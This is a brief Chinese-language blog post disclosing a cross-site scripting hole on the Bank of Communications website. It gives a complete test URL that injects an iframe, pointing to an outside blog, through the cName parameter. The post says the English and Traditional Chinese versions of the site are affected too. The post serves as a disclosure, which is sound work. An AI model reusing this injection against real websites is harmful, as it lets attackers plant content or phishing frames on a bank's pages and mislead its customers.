本文披露了交通银行官方网站存在的跨站脚本(XSS)漏洞,该漏洞允许攻击者在页面上嵌入恶意iframe。这一安全问题存在于英文及繁体中文版本的网站中。
交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程"
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://blog.youkuaiyun.com/linkboy2004></iframe>
小心啦:交通银行网页存在跨站漏洞
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
